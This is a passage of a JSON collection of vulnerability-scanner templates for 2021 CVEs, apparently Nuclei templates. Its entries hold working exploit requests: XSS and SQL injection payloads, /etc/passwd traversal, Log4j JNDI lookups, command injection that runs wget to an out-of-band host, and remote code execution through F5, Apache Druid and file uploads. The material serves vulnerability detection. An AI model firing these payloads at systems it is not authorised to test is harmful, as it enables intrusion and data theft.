Credentials Disclosure","severity":"medium"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ftp_username","ftp_password","ftp_permission","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<input name=\"admin_passwd\" type=\"password\" id=\"admin_passwd\" size=\"20\" maxlength=\"15\" value =\"(.*)\" />"],"part":"body"}]}]},{"id":"CVE-2021-46072","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_service HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1\n","GET /admin/?page=maintenance/services HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-25104","info":{"name":"WordPress Ocean Extra <1.9.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/?step=demo&page=owp_setup&a\"><script>alert(/XSS/)</script>   HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["OceanWP","><script>alert(/XSS/)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21975","info":{"name":"vRealize Operations Manager API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /casa/nodes/thumbprints HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n[\"127.0.0.1:443/ui/\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vRealize Operations Manager","thumbprint","address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24235","info":{"name":"WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["input/Autofocus/%0D*/Onfocus=alert(123);","goto-tour-list-js-extra"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29490","info":{"name":"Jellyfin 10.7.2 - Server Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/","{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2021-24176","info":{"name":"WordPress JH 404 Logger <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["JH 404 Logger"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28854","info":{"name":"VICIdial Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/agc/vicidial_mysqli_errors.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["text/plain"],"part":"header"},{"type":"status","status":[200]},{"type":"word","words":["vdc_db_query"],"part":"body"}]}]},{"id":"CVE-2021-25112","info":{"name":"WordPress WHMCS Bridge <6.4b - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<strong><img src onerror=alert(document.domain)></strong>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20837","info":{"name":"MovableType - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n  <methodName>mt.handler_to_coderef</methodName>\n  <params>\n    <param>\n      <value>\n        <base64>\n          {{base64(\"`wget http://{{interactsh-url}}`\")}}\n        </base64>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["failed loading package"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3297","info":{"name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /status.htm HTTP/1.1\nHost: {{Hostname}}\nCookie: language=en; login=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Running Time","Firmware Version","Firmware Build Time"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24750","info":{"name":"WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24472","info":{"name":"Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43287","info":{"name":"Pre-Auth Takeover of Build Pipelines in GoCD","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24347","info":{"name":"WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\n\n{{nonce}}\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-name\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"{{randstr}}.pHP\"\nContent-Type: image/svg+xml\n\n<?php\n\necho \"CVE-2021-24347\";\n\n?>\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\n\nUpload\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--\n","GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower(\"{{randstr}}.pHP\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"CVE-2021-24347\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"cdm_upload_file_field\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-24647","info":{"name":"Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_1, \"pieregister\")","contains(body_3, \"Username\") && contains(body_3, \"email-description\")"],"condition":"and"}]}]},{"id":"CVE-2021-21389","info":{"name":"BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-json/buddypress/v1/signup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\n  \"user_login\":\"{{randstr}}\",\n  \"password\":\"{{randstr}}\",\n  \"user_name\":\"{{randstr}}\",\n  \"user_email\":\"{{randstr}}@interact.sh\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["user_login","registered","activation_key","user_email"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45046","info":{"name":"Apache Log4j2 - Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\nAccept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":["interactsh_ip"]},{"type":"regex","group":2,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]},{"type":"regex","group":1,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-25297","info":{"name":"Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["<b>Ping</b>","Switch Details"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-24406","info":{"name":"WordPress wpForo Forum < 1.9.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-22986","info":{"name":"F5 iControl REST -  Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nAuthorization: Basic YWRtaW46\nContent-Type: application/json\nCookie: BIGIPAuthCookie=1234\nConnection: close\n\n{\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\nConnection: close\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n"],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"commandResult\":\"(.*)\""],"part":"body"}]}]},{"id":"CVE-2021-3577","info":{"name":"Motorola Baby Monitors - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["set_city_timezone"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37305","info":{"name":"Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username\":\"admin","success\":true","result\":{"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41878","info":{"name":"i-Panel Administration System 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=a onerror=alert(\"document.domain\")>","i-Panel Administration"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21805","info":{"name":"Advantech R-SeeNet 2.4.12 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ping.php?hostname=|dir"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Ping |dir</title>","bottom.php"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25067","info":{"name":"Landing Page Builder < 1.4.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test\"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"test\\\\\\\" style=animation-name:rotation onanimationstart=alert(document.domain)\")","contains(body_2, \"Enter Page Title\")"],"condition":"and"}]}]},{"id":"CVE-2021-40870","info":{"name":"Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /v1/backend1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5(\"CVE-2021-40870\"); ?>\n","GET /v1/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["0d95513363fd69b9fee712f333293654"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36748","info":{"name":"PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 404","contains(body_1, \"prestashop\")","contains(tolower(header_2), 'index.php?controller=404')","len(body_2) == 0"],"condition":"and"}]}]},{"id":"CVE-2021-24214","info":{"name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ERROR (<script>alert(document.domain)</script>):","Login with OpenID Connect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44152","info":{"name":"Reprise License Manager 14.2 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/menu"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Administration Commands"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27309","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>.php"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24275","info":{"name":"Popup by Supsystic <1.10.5 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38314","info":{"name":"WordPress Redux Framework <=4.2.11 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body)<50"]},{"type":"regex","name":"meme","part":"body","regex":["[a-f0-9]{32}"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["[a-f0-9]{32}"],"part":"body"}]}]},{"id":"CVE-2021-21973","info":{"name":"VMware vSphere - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHost: {{Hostname}}\nVcip: {{interactsh-url}}\nVcpassword: {{rand_base(6)}}\nVcusername: {{rand_base(6)}}\nReqresource: {{rand_base(6)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The server sent HTTP status code 200"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-1472","info":{"name":"Cisco Small Business RV Series - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nCookie: sessionid='`wget http://{{interactsh-url}}`'\nAuthorization: QUt6NkpTeTE6dmk4cW8=\nContent-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\n\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"option\"\n\n5NW9Cw1J\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"destination\"\n\nJ0I5k131j2Ku\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file.path\"\n\nEKsmqqg0\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file\"; filename=\"config.xml\"\nContent-Type: application/xml\n\nqJ57CM9\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"filename\"\n\nJbYXJR74n.xml\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"GXbLINHYkFI\"\n\n<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>\n-----------------------------392306610282184777655655237536--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"jsonrpc\":"]}]}]},{"id":"CVE-2021-44528","info":{"name":"Open Redirect in Host Authorization Middleware","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: //interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[301,302,307,308]}]}]},{"id":"CVE-2021-20114","info":{"name":"TCExam <= 14.8.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cache/backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /cache/backup","Parent Directory",".sql.gz"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25646","info":{"name":"Apache Druid - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"type\":\"index\",\n\"spec\":{\n   \"ioConfig\":{\n      \"type\":\"index\",\n      \"firehose\":{\n         \"type\":\"local\",\n         \"baseDir\":\"/etc\",\n         \"filter\":\"passwd\"\n      }\n   },\n   \"dataSchema\":{\n      \"dataSource\":\"odgjxrrrePz\",\n      \"parser\":{\n         \"parseSpec\":{\n            \"format\":\"javascript\",\n            \"timestampSpec\":{\n\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n            \"\":{\n               \"enabled\":\"true\"\n            }\n         }\n      }\n   }\n},\n\"samplerConfig\":{\n   \"numRows\":10\n}\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["numRowsRead","numRowsIndexed"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21972","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["VSPHERE-UI-JSESSIONID"],"condition":"and"},{"type":"regex","part":"body","regex":["(Install|Config) Final Progress"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27319","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-25074","info":{"name":"WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-29484","info":{"name":"Ghost CMS <=4.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ghost/preview"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XMLHttpRequest.prototype.open"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24891","info":{"name":"WordPress Elementor Website Builder <3.1.4 - Cross-Site 